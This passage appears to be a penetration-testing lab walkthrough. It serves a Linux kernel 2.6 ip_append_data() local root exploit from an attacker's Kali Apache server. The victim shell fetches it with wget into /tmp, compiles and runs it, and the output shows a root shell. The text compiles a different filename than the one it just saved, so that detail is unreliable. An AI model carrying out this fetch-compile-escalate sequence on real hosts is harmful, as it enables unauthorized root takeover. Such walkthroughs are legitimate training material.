Linux Kernel 2.6 < 2.6.19 (32bit) ip_append_data() ring0 Root Exploit       /linux/local/9542.c

Let's serve it from Kali's Apache so the victim can fetch it (world-readable is all Apache needs, so 644 rather than 777):
# cp /usr/share/exploitdb/platforms/linux/local/9542.c /var/www/ip_append_data.c
# chmod 644 /var/www/ip_append_data.c
# service apache2 start

On the victim shell:
$ wget http://172.16.32.132/ip_append_data.c
--19:32:20--  http://172.16.32.132/ip_append_data.c
           => `ip_append_data.c'
Connecting to 172.16.32.132:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,645 (2.6K) [text/x-csrc]
ip_append_data.c: Permission denied

Cannot write to `ip_append_data.c' (Permission denied).

Ok, the shell started in the web directory, which the apache user cannot write to. Let's try /tmp (it's usually world-writable):
$ cd /tmp
$ wget http://172.16.32.132/ip_append_data.c
--19:34:00--  http://172.16.32.132/ip_append_data.c
           => `ip_append_data.c.1'
Connecting to 172.16.32.132:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,645 (2.6K) [text/x-csrc]

    0K ..                                                    100%  280.27 MB/s

19:34:00 (280.27 MB/s) - `ip_append_data.c.1' saved [2645/2645]

Success! Let's compile and run:
$ gcc ip_append_data.c -o exploit
$ ./exploit
sh: no job control in this shell
# whoami
root
# id
uid=0(root) gid=0(root) groups=48(apache)